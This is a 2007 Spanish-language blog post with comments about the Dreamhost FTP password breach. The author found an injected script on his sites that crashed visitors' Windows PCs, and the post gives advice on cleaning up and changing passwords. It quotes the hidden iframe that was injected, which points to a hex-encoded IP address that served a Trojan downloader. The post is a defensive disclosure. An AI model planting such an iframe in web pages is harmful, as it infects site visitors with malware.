Ayer me llegó un e-mail de Dreamhost diciendo:
Un tercero obtuvo el camino de poder tener las contraseñas asociadas con 3500 cuentas de FTP y ha usado esa información para adjuntar un código al index de cada sitio usando scripts automáticos, primordialmente para optimización SEO (optimización de un sitio para una búsqueda).
Nuestros reportes indican que solo un 20% de las cuentas cuyos passwords fueron accedidos han sufrido este cambio. esto representa un 0.15% de todas las cuentas de Dreamhost. La mayoría de las cuentas estan intactas.
Yo pensé que no me afectaría, 3500 cuentas es menos de los que usan Dreamhost en todo Texas. Pero si así fuera, muy poco probable según ese e-mail, era algo SEO, para cuestiones de optimización de búsqueda, lo que me dió a entender que si yo sufría el ataque vería un enlace extra en mis sitios para dar Page Rank al que hizo el script lo cual resultó ser: FALSO
Hace 10 minutos un amigo mío me indica que por visitar mi sitio: Vectorice usando Internet Explorer 6, se le desconfiguró la conexión a internet y luego tuvo pantalla negra en su PC. Su Sistema Operativo Windows se arruinó y tuvo que reinstalar todo desde cero.
El script arruina a Windows si usas Internet Explorer 6 pero con Firefox no pasa nada.
Vectorice.com ya esta solucionado. Encontré el siguiente script en el index:
IFRAME src='http://0xcb.0xdf.0x9e.0x0c/t' width='6' height='6' style='visibility: hidden;'>
</IFRAME
Los blogs con WordPress
Los dominios que tengan un blog con WordPress parece que no representarán amenaza alguna, porque encontré ese script en una instalación que tengo en un blog de prueba en vectorice y en elk antiguo ctrl-F5. El script estaba luego del tag < /html >, por lo que queda inactivado automáticamente.
Se recomienda que revisen cada uno de sus sitios con un index.html, index.php, etc, y cada sub-URL. Cambien también la contraseña de sus cuentas de FTP y de su panel de Control.
Enviar esta noticia a un amigo
Ver Noticias Similares 
Buscar más en Google
4 Comentarios en “Varias cuentas de Dreamhost fueron hackeadas”
Hola tio, vaya putada!Por cierto sabes donde se cambia la contraseña del FTP de dreamhost, esque con tantas opciones no la encuentro en el panel.
Gracias!
Las cuentas FTP las cambias en el menú lateral:
Users>Manage Users
Tu contraseña del Panel de Control la cambias en el enlace de arriba:
Edit Profile>Security
Para WordPress:
Recuerden que también hay un index.php en la carpeta wp-admin y wp-content, ahí también he encontrado el script con iframe.
Antivirus
Mi Antivirus ha detectado un Trojan: Downloader
Discovered: June 8, 2001
Updated: February 13, 2007 11:50:11 AM
Type: Trojan Horse
Systems Affected: Windows 2000, Windows 95, Windows 98, Windows Me, Windows NT, Windows XP
Downloader does the following:
- Goes to a specific Web or FTP site that its author created and attempts to download new Trojans, viruses, worms, or their components.
- After the Trojan downloads the files, it executes them.
Vaya una lástima por dreamhost. Esto hace que su servicio decaiga, osea el descuido por las cuentas http://ftp. Bueno felizmente a mi no me ha tocado, aunque no estuvo de mas dar una chekeadita en los archivos en busca de ese iframe.
Saludos
The Ghost
Escribe un comentario...
RSS a los comentarios de esta noticia
* Si te registras en Gravatar tendrás tu imagen junto a los comentarios de este y muchos otros blogs.
Nova
7 de Junio de 2007 a las 5:52 pm